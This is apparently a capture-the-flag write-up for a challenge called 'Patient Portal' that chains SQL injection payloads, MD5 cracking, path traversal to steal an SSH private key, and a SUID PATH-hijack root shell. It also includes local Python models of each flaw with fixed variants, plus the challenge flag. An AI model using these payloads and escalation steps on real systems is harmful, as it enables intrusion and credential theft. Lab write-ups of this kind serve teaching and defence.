ESPILON-CTF-2026-Writeups/Misc/Patient_Portal/README.md
Eun0us 1c42421380 Add 107 terminal screenshots and replace all 📸 placeholders
- Generated screenshots for all 33 challenges (ESP, Hardware, IoT, OT, Misc, Web3)
- Replaced all 123 placeholder lines with actual PNG image references
- Cleaned duplicate images from previously partial updates
- All write-ups now have full illustrated solutions
2026-03-27 00:34:47 +00:00


# Patient Portal
| Field | Value |
|-------|-------|
| Category | Misc |
| Difficulty | Medium-Hard |
| Points | 500 |
| Author | Eun0us |
| CTF | Espilon 2026 |
---
## Description
The WIRED-MED network at Clinique Sainte-Mika runs a patient portal for staff.
Intelligence suggests the system was hastily deployed by contractor M. Eiri.
Gain full control of the machine.
**Ports:**
- 8080: Web Portal (HTTP)
- 2222: SSH
Format: **ESPILON{flag}**
---
## TL;DR
SQL injection on the `/search` endpoint to dump credentials and the SSH passphrase. Log in
as admin, exploit path traversal on the report download endpoint to steal the SSH private key.
SSH in as `webadmin`. Find a SUID binary that calls `logger` with a relative path. Hijack it
via PATH injection to spawn a root shell and read the flag.
---
## Tools
| Tool | Purpose |
|------|---------|
| Browser / `curl` | SQL injection, admin login, path traversal |
| `hashcat` / CrackStation | MD5 crack for admin password |
| `ssh` | Login as webadmin |
| `bash` | PATH injection privilege escalation |
---
## Solution
### Stage 1 — SQL Injection
The `/search?q=` endpoint concatenates `q` into a SELECT that returns six columns, so a UNION payload must also select six; any other count produces a SQL error, which is how the count is found. In the browser the address bar encodes the payload for you; with curl, URL-encode it (`curl -G --data-urlencode "q=<payload>" http://<HOST>:8080/search`), since the quote and the spaces are otherwise mangled.
**Enumerate columns:**
```
/search?q=' UNION SELECT 1,2,3,4,5,6--
```
**Discover tables:**
```
/search?q=' UNION SELECT 1,name,3,4,5,6 FROM sqlite_master WHERE type='table'--
```
Tables: `patients`, `users`, `system_config`
**Dump users:**
```
/search?q=' UNION SELECT 1,username,password_hash,role,5,6 FROM users--
```
Results:
- `admin` : MD5 hash `e0b7e413c064de43c6c1ca40a8c175a1`
- `nurse01` : (irrelevant)
**Dump system_config:**
```
/search?q=' UNION SELECT 1,key,value,3,4,5 FROM system_config--
```
Key finding: `ssh_passphrase = wired-med-013`
![SQLi response showing the admin hash and ssh_passphrase rows](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/patient_sqli.png)
**Crack the admin password.** The hash is unsalted MD5, so CrackStation or `hashcat -m 0` recovers it at once; confirm the candidate locally:
```bash
echo -n "SainteMika2026" | md5sum
# e0b7e413c064de43c6c1ca40a8c175a1
```
Password: `SainteMika2026`
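The whole of Stage 1 modelled locally, as an added example that is not code from the write-up or from the portal: an in-memory SQLite stand-in for the `/search` endpoint shows why the UNION payloads need exactly six columns, how `sqlite_master` and the `users`/`system_config` rows ride back through the patients result set, how the unsalted MD5 falls to a wordlist, and what the parameterised query that closes the hole looks like. The table names, the `users`/`system_config` column names and the cracked password come from the write-up; the patients schema, the sample rows, the `LIKE '%q%'` query shape and the wordlist are constructed for this example.

```python
"""Constructed model of the vulnerable /search endpoint (added example)."""
import hashlib
import sqlite3

ADMIN_PASSWORD = "SainteMika2026"  # value the write-up recovers
# Constructed wordlist; hashcat/CrackStation do the same comparison at scale.
WORDLIST = ["password", "clinique", "SainteMika", "SainteMika2026", "wired-med"]


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the portal database (schema assumed)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE patients(id INTEGER, name TEXT, dob TEXT, ward TEXT, doctor TEXT, notes TEXT);
        CREATE TABLE users(id INTEGER, username TEXT, password_hash TEXT, role TEXT);
        CREATE TABLE system_config(key TEXT, value TEXT);
    """)
    db.executemany("INSERT INTO patients VALUES (?,?,?,?,?,?)", [
        (101, "A. Dupont", "1971-03-02", "B2", "Dr. Lamy", "stable"),
        (102, "C. Martin", "1988-11-19", "C1", "Dr. Roux", "post-op"),
    ])
    db.executemany("INSERT INTO users VALUES (?,?,?,?)", [
        (1, "admin", hashlib.md5(ADMIN_PASSWORD.encode()).hexdigest(), "admin"),
        (2, "nurse01", hashlib.md5(b"nurse01!").hexdigest(), "nurse"),
    ])
    db.executemany("INSERT INTO system_config VALUES (?,?)", [
        ("ssh_port", "2222"),
        ("ssh_passphrase", "wired-med-013"),
    ])
    return db


def search_vulnerable(db, q):
    """What a hastily deployed portal does: concatenate the parameter."""
    sql = f"SELECT id,name,dob,ward,doctor,notes FROM patients WHERE name LIKE '%{q}%'"
    return db.execute(sql).fetchall()


def search_fixed(db, q):
    """Same query with a bound parameter; the payload is just text to match."""
    sql = "SELECT id,name,dob,ward,doctor,notes FROM patients WHERE name LIKE ?"
    return db.execute(sql, (f"%{q}%",)).fetchall()


def find_column_count(db, max_cols=10):
    """Grow the UNION until SQLite stops rejecting the column-count mismatch."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            search_vulnerable(db, f"' UNION SELECT {cols}--")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def inject(db, union_select):
    """Send a payload in the write-up's form and keep only the injected rows,
    recognised by the literal 1 the payloads place in the id column
    (constructed patient ids start at 100, so they cannot collide)."""
    rows = search_vulnerable(db, f"' UNION {union_select}--")
    return [r for r in rows if r[0] == 1]


def enumerate_tables(db):
    rows = inject(db, "SELECT 1,name,3,4,5,6 FROM sqlite_master WHERE type='table'")
    return sorted(r[1] for r in rows)


def dump_users(db):
    rows = inject(db, "SELECT 1,username,password_hash,role,5,6 FROM users")
    return {r[1]: (r[2], r[3]) for r in rows}


def dump_config(db):
    rows = inject(db, "SELECT 1,key,value,3,4,5 FROM system_config")
    return {r[1]: r[2] for r in rows}


def crack_md5(target_hex, wordlist):
    """Unsalted MD5: hash each candidate and compare (hashcat -m 0 in miniature)."""
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == target_hex:
            return candidate
    return None


if __name__ == "__main__":
    db = build_db()
    print("columns:", find_column_count(db))
    print("tables:", enumerate_tables(db))
    users = dump_users(db)
    print("admin:", users["admin"][0], "->", crack_md5(users["admin"][0], WORDLIST))
    print("ssh_passphrase:", dump_config(db)["ssh_passphrase"])
    print("fixed endpoint, same payload:", search_fixed(db, "' UNION SELECT 1,2,3,4,5,6--"))
```

The marker-column trick (`1` in the first position) is only a convenience for picking the injected rows out of the legitimate result; on the live portal the rows simply appear among the patient records. The fixed variant returns nothing for the payload because the bound parameter can never change the statement's structure.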
---
### Stage 2 — Admin Access
Log in at `/login`:
- Username: `admin`
- Password: `SainteMika2026`
The admin panel reveals: SSH port 2222, user `webadmin`.
![admin panel after login showing report links and system info](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/patient_admin.png)
---
### Stage 3 — Path Traversal
The `/admin/reports?file=` endpoint appends the requested filename to the reports directory without canonicalising it, so `../` sequences walk out of that directory. Surplus `../` beyond `/` are harmless, so overshooting the depth costs nothing.
**Confirm the traversal (the output also shows the `webadmin` account):**
```
/admin/reports?file=../../../etc/passwd
```
**Extract the SSH private key:**
```
/admin/reports?file=../../../home/webadmin/.ssh/id_rsa
```
Save the key to `id_rsa` locally.
![path traversal response returning the id_rsa private key](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/patient_lfi.png)
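The report download logic reproduced in a throw-away directory tree, as an added example that is not code from the write-up or the portal: it shows how `os.path.join` walks `../` (and silently discards the base directory when the input is an absolute path), and the canonicalise-then-prefix-check that a fixed endpoint needs. The reports directory location (three levels deep, matching the write-up's three `../`), the file contents and the key placeholder are all constructed; the real key material is not reproduced.

```python
"""Constructed model of the /admin/reports?file= traversal (added example)."""
import os
import tempfile


def _write(path, content):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(content)


def build_fs():
    """Constructed mini filesystem: <root>/opt/portal/reports is the reports
    directory (location assumed); <root>/etc/passwd and
    <root>/home/webadmin/.ssh/id_rsa are the targets. Returns (root, reports)."""
    root = tempfile.mkdtemp(prefix="patient-portal-")
    reports = os.path.join(root, "opt", "portal", "reports")
    _write(os.path.join(reports, "daily.txt"), "daily report (constructed)\n")
    _write(os.path.join(root, "etc", "passwd"),
           "root:x:0:0:root:/root:/bin/bash\n"
           "webadmin:x:1000:1000::/home/webadmin:/bin/bash\n")
    _write(os.path.join(root, "home", "webadmin", ".ssh", "id_rsa"),
           "-----BEGIN OPENSSH PRIVATE KEY-----\n"
           "(constructed placeholder, not a real key)\n"
           "-----END OPENSSH PRIVATE KEY-----\n")
    return root, reports


def read_report_vulnerable(reports_dir, file):
    """As deployed: the user-controlled string goes straight into join()."""
    with open(os.path.join(reports_dir, file)) as f:
        return f.read()


def read_report_fixed(reports_dir, file):
    """Resolve first, then refuse any canonical path outside reports_dir.
    realpath also collapses symlinks, so a link planted inside reports/
    cannot point back out."""
    base = os.path.realpath(reports_dir)
    target = os.path.realpath(os.path.join(base, file))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing {file!r}: outside the reports directory")
    with open(target) as f:
        return f.read()


def traversal_demo():
    """Returns (passwd_leaked, key_leaked, absolute_path_leaked, fixed_blocked)."""
    root, reports = build_fs()
    passwd = read_report_vulnerable(reports, "../../../etc/passwd")
    key = read_report_vulnerable(reports, "../../../home/webadmin/.ssh/id_rsa")
    # os.path.join(base, "/abs/path") == "/abs/path": no "../" needed at all
    absolute = read_report_vulnerable(reports, os.path.join(root, "etc", "passwd"))
    try:
        read_report_fixed(reports, "../../../home/webadmin/.ssh/id_rsa")
        blocked = False
    except PermissionError:
        blocked = True
    return ("webadmin:" in passwd, "PRIVATE KEY" in key, "webadmin:" in absolute, blocked)


if __name__ == "__main__":
    print(traversal_demo())
```

The absolute-path case is the one that denylist filters on `..` miss entirely; comparing canonical paths catches both, and it still serves legitimate files such as `daily.txt`.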
---
### Stage 4 — SSH Access
```bash
chmod 600 id_rsa
ssh -i id_rsa -p 2222 webadmin@<HOST>
# Passphrase: wired-med-013 (from system_config)
```
---
### Stage 5 — Privilege Escalation
**Find SUID binaries:**
```bash
find / -perm -4000 -type f 2>/dev/null
```
Found: `/opt/navi-monitor/vital-check` (SUID root)
**Inspect the binary:**
```bash
strings /opt/navi-monitor/vital-check | grep logger
```
The binary calls `system("logger -t vital-check 'check complete'")`. `logger` is a bare command name, so the `/bin/sh -c` that `system()` spawns resolves it through `PATH`, and the SUID binary inherits `PATH` unchanged from whoever runs it.
![strings output confirming the relative logger call](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/patient_strings.png)
**Exploit via PATH hijacking:**
```bash
cat > /tmp/logger <<'EOF'
#!/bin/bash -p
# -p on the shebang as well: without it bash resets euid to the real uid
# before the script body runs, and the inner -p has nothing left to keep
exec /bin/bash -p
EOF
chmod +x /tmp/logger
export PATH=/tmp:$PATH
/opt/navi-monitor/vital-check
```
`-p` matters twice. Bash sets its effective UID back to the real UID whenever the two differ and `-p` is absent, so a plain `#!/bin/bash` interpreter line would discard root before `/bin/bash -p` ever ran; with `-p` on the shebang the euid of 0 inherited from the SUID binary survives into the interactive shell. (If `vital-check` calls `setuid(0)` itself before `system()`, the plain form also works; the `-p` form works either way.)
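Why the bare command name is hijackable, as an added example that is not code from the write-up or from the `vital-check` binary: `subprocess.run(cmd, shell=True)` is the same `/bin/sh -c cmd` that C's `system()` performs, so the shell looks `logger` up through `PATH` taken from the caller's environment. A fake `logger` in a temporary directory records that it was chosen instead of the real one. The SUID part cannot be shown without root and is not attempted; the hardened variant pins `PATH`, the minimum fix (the better one is `execve` on the absolute path with a scrubbed environment and no shell). Directory names and the marker file are constructed.

```python
"""Constructed demonstration of PATH hijacking through system() (added example)."""
import os
import subprocess
import tempfile

LOGGER_CMD = "logger -t vital-check 'check complete'"   # the call strings reveals
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def plant_fake_logger(directory):
    """Attacker step: an executable named `logger`. The real exploit would
    exec /bin/bash -p here; this one only leaves a marker so the demo is observable."""
    marker = os.path.join(directory, "hijacked")
    path = os.path.join(directory, "logger")
    with open(path, "w") as f:
        f.write(f"#!/bin/sh\necho hijacked > '{marker}'\n")
    os.chmod(path, 0o755)
    return marker


def vital_check_vulnerable(env):
    """Model of the SUID binary: system() with a bare command name,
    environment inherited from the caller."""
    subprocess.run(LOGGER_CMD, shell=True, env=env, check=False,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)


def vital_check_hardened(env):
    """Same call with PATH pinned before the shell ever searches it."""
    safe_env = dict(env, PATH=SAFE_PATH)
    subprocess.run(LOGGER_CMD, shell=True, env=safe_env, check=False,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)


def hijack_demo():
    """Returns (vulnerable_ran_our_logger, hardened_ran_our_logger)."""
    workdir = tempfile.mkdtemp(prefix="path-hijack-")
    marker = plant_fake_logger(workdir)
    # export PATH=/tmp:$PATH, with our directory standing in for /tmp
    attacker_env = dict(os.environ, PATH=f"{workdir}:{os.environ.get('PATH', SAFE_PATH)}")

    vital_check_vulnerable(attacker_env)
    vulnerable_hit = os.path.exists(marker)
    if vulnerable_hit:
        os.remove(marker)

    vital_check_hardened(attacker_env)
    hardened_hit = os.path.exists(marker)
    return vulnerable_hit, hardened_hit


if __name__ == "__main__":
    print(hijack_demo())
```

Pinning `PATH` stops this particular hijack, but a SUID program that still goes through `/bin/sh` remains exposed to every other shell-inherited variable; dropping the shell and calling the absolute path removes the whole class.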
**Read the flag:**
```bash
cat /root/root.txt
```
![root shell reading /root/root.txt with the flag](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/patient_root.png)
---
## Flag
`ESPILON{r00t_0f_s41nt3_m1k4}`